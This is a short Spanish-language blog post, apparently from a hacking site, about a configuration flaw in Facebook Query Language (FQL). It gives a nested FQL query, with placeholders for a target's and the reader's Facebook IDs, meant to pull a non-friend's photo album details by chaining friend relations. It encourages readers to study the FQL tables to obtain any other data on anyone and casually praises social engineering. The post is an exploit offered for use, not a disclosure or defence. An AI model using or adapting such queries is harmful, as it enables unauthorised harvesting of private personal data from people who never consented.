FQL (Facebook Query Language) Nos Hace Vulnerables.

Leyendo Segu-info me encontre con la noticia de que habia un problema en la configuracion de FQL (Facebook Query Language) entonces dije si el problema existe tengo que averiguar como se puede acceder a dicho contenido.
Vos a hacer un comentario que no tiene mucho que ver o tal vez si, hace poco una amiga hizo algo similar pero sin conocimientos informaticos, todo basado en la herramienta mas grande que poseemos los seres humanos (nuestro cerebro), alta ingeria social aplico ;) . Hecho el corolario pasemos a ver como podemos utilizar esta falla de configuracion a nuestro favor:

Con el siguiente codigo podremos obtener informacion de cualquier persona de facebook, con tan solo ser usuario standar (estar registrados :P).

select
aid,
cover_pid,
name,
created,
description,
location,
size,
link,
visible,
type
from
album
where
owner
in
(
select
uid1
from
friend
where
uid1 = [ID FACEBOOK A VULNERAR]
and
uid2
in
(
select
uid1,
uid2
from
friend
where
uid1 = [MI ID DE FACEBOOK]
and
(
uid2 = [ID DE MI AMIGO]
or
uid1 = [ID DE MI AMIGO]
)
)
)
ahora si prestan atencion en la imagen:



Se puede apreciar lo que remarque a las izquierda, para que ustedes pongan de la misma forma y asi poder obtener los datos del id a investigar
En este caso vemos su album de fotos, pero si siguen investigando, pueden conseguir cualquier informacion. Si alguien quiere las tablas de facebook.com aqui estan: http://wiki.developers.facebook.com/index.php/FQL_Tables
Solo es cuestion de leer un poquito mas para obtener otros datos


FUENTE: http://www.delincuentedigital.com.ar PD: GRACIAS NEGROO